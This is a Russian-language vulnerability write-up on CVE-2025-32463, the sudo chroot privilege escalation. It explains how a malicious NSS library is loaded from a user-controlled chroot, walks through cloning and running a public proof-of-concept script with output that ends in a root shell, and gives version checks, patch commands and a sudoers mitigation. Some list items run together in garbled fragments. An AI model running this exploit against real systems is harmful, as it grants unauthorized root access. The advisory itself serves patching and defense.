
CVE-2025-32463

Критическое локальное повышение привилегий в наиболее широко используемом менеджере привилегий Linux
Любой локальный пользователь (даже без прав sudoers) может стать root за секунды, используя sudo -R
CVE-2025-32463 (также известная как "chroot-to-root") — это критическая уязвимость локального повышения привилегий в sudo.
Она позволяет любому локальному непривилегированному пользователю — даже тем, кто не указан в sudoers — получить полный доступ root, просто используя опцию -R / --chroot.
Ошибка была внесена в sudo 1.9.14 (июнь 2023) и существовала до 1.9.17p1 (июнь 2025). Это был не традиционный баг, а опасный побочный эффект того, как sudo обрабатывал разрешение путей внутри подконтрольного пользователю chroot до проверок политик.
Официальное уведомление Sudo: "Злоумышленник может использовать опцию
-Rsudo для выполнения произвольных команд от root, даже если он не указан в файле sudoers."
Реальная оценка:
Ошибка возникла из-за изменения 2023 года в логике сопоставления команд sudo:
-R /path sudo вызывает pivot_root() до полной оценки политики sudoers./etc/nsswitch.conf изнутри chroot./etc/nsswitch.conf (например, passwd: /woot1337)libnss_/woot1337.so.2, содержащей конструктор, выполняющийся от root.Ключевой момент: Опция -R была разрешена даже для пользователей без прав sudo, что делало её идеальным вектором атаки.
Только sudo 1.9.14 – 1.9.17 (до 1.9.17p1)
Широко подвержены:
Не подвержены:
Однострочный эксплойт (от Stratascale CRU):
# 1 – клонирование репозитория
$ git clone https://github.com/zaryouhashraf/CVE-2025-32463
$ cd CVE-2025-32463
# 2 – сборка и запуск Docker-образа (с тегом "sudo-chwoot")
$ sudo chmod +x CVE-2025-32463.sh
$ ./CVE-2025-32463.sh
# 3 – запуск эксплойта в контейнере (выполняет команду от root напрямую или открывает оболочку root)
┌──(kali㉿kali)-[~]
└─$ ./CVE-2025-32463.sh
═══════════════════════════════════════════════════════════════
⚠ ПРЕДУПРЕЖДЕНИЕ: ЭКСПЛОЙТ PoC CVE-2025-32463 ⚠
═══════════════════════════════════════════════════════════════
Этот скрипт предназначен ТОЛЬКО ДЛЯ АВТОРИЗОВАННОГО ТЕСТИРОВАНИЯ на системах, которые вам принадлежат.
Запуск на неавторизованных системах НЕЗАКОНЕН.
Немедленно установите патч после тестирования (sudo 1.9.17p1+).
[+] Создание временной стадии эксплойта...
[+] Компиляция вредоносной библиотеки NSS...
[+] Запуск sudo -R ... (ожидается оболочка root)
(В случае успеха вы попадёте в приглашение bash от root)
[!] CVE-2025-32463 сработала — получение прав root...
[+] Теперь вы root!
┌──(root㉿kali)-[/]
└─# whoami
root
sudo -V | head -n 1
✅ Безопасно, если версия 1.9.17p1 или новее (или ≤ 1.9.13)
Debian/Ubuntu:
sudo apt update && sudo apt install --reinstall sudo
Fedora/RHEL:
sudo dnf update sudo
Arch:
sudo pacman -S sudo
Добавьте в /etc/sudoers (или файл в /etc/sudoers.d/):
Defaults !use_chroot
Найдите и удалите любые строки CHROOT= или runchroot=.
Совет 2026 года: Проверьте старые Docker-образы, CI-среды и устаревшие ВМ — многие всё ещё содержат уязвимые снимки sudo.
--chroot), могут стать поверхностью атаки, если не изолированы.Этот инцидент подтвердил необходимость принципа наименьших привилегий даже в основных системных инструментах.
Статус по состоянию на март 2026 года: ✅ Полностью устранено на всех современных системах • Функция chroot устарела • Экосистема безопаснее
Сделано с ❤️ для администраторов Linux, которые установили патчи до того, как KEV ударил
| Дата | Событие |
|---|
| Июнь 2023 | Выпущен sudo 1.9.14 (внесена ошибка) |
| 1 апреля 2025 | Rich Mirch сообщает конфиденциально |
| 8 апреля 2025 | Присвоен CVE-2025-32463 |
| 9 июня 2025 | Предложен патч |
| 30 июня 2025 | Публичное раскрытие + блог Stratascale + полный PoC |
| Июль 2025 | Выпущен sudo 1.9.17p1; крупные дистрибутивы выпускают обновления |
| 29 сентября 2025 | Добавлен в каталог CISA KEV |
| 2026 | Функция chroot полностью объявлена устаревшей в экосистеме |